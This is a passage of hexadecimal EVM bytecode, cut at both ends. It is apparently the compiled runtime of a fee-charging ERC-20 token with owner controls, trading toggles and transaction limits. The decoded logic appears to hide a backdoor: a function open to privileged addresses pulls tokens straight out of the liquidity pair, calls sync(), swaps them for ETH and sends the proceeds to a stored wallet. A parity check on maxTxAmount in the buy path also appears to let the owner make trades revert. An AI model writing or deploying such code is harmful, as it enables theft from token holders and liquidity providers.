132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a906143ec565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b60606004805461187390614142565b80601f016020809104026020016040519081016040528092919081815260200182805461189f90614142565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a149061447e565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad6919061423d565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f906144ea565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b729061453b565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ecc565b8461342191906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f17565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614f8a565b816001815181106135ed576135ec614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150b0565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061453b565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b60006143d6600483613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614468603983613c6c565b91506144738261440c565b604082019050919050565b600060208201905081810360008301526144978161445b565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144d4600f83613c6c565b91506144df8261449e565b602082019050919050565b60006020820190508181036000830152614503816144c7565b9050919050565b600081905092915050565b50565b600061452560008361450a565b915061453082614515565b600082019050919050565b600061454682614518565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a4a602583613c6c565b9150614a55826149ee565b604082019050919050565b60006020820190508181036000830152614a7981614a3d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614adc602383613c6c565b9150614ae782614a80565b604082019050919050565b60006020820190508181036000830152614b0b81614acf565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b48601683613c6c565b9150614b5382614b12565b602082019050919050565b60006020820190508181036000830152614b7781614b3b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614bda603583613c6c565b9150614be582614b7e565b604082019050919050565b60006020820190508181036000830152614c0981614bcd565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c6c603683613c6c565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b6000614cad82613d76565b9150614cb883613d76565b925082614cc857614cc76141df565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d2f602483613c6c565b9150614d3a82614cd3565b604082019050919050565b60006020820190508181036000830152614d5e81614d22565b9050919050565b6000614d7082613d76565b9150614d7b83613d76565b9250828203905081811115614d9357614d9261420e565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115614df057808604811115614dcc57614dcb61420e565b5b6001851615614ddb5780820291505b8081029050614de985614d99565b9450614db0565b94509492505050565b600082614e095760019050614ec5565b81614e175760009050614ec5565b8160018114614e2d5760028114614e3757614e66565b6001915050614ec5565b60ff841115614e4957614e4861420e565b5b8360020a915084821115614e6057614e5f61420e565b5b50614ec5565b5060208310610133831016604e8410600b8410161715614e9b5782820a905083811115614e9657614e9561420e565b5b614ec5565b614ea88484846001614da6565b92509050818404811115614ebf57614ebe61420e565b5b81810290505b9392505050565b6000614ed782613d76565b9150614ee283613f73565b9250614f0f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614df9565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614f8481613d4a565b92915050565b600060208284031215614fa057614f9f613d13565b5b6000614fae84828501614f75565b91505092915050565b6000819050919050565b6000614fdc614fd7614fd284614fb7565b613e4f565b613d76565b9050919050565b614fec81614fc1565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61502781613d38565b82525050565b6000615039838361501e565b60208301905092915050565b6000602082019050919050565b600061505d82614ff2565b6150678185614ffd565b93506150728361500e565b8060005b838110156150a357815161508a888261502d565b975061509583615045565b925050600181019050615076565b5085935050505092915050565b600060a0820190506150c56000830188613ec9565b6150d26020830187614fe3565b81810360408301526150e48186615052565b90506150f36060830185613faa565b6151006080830184613ec9565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615166602183613c6c565b91506151718261510a565b604082019050919050565b6000602082019050818103600083015261519581615159565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122088d7c2899de5f24f08d7b0d14687856976bce0d4e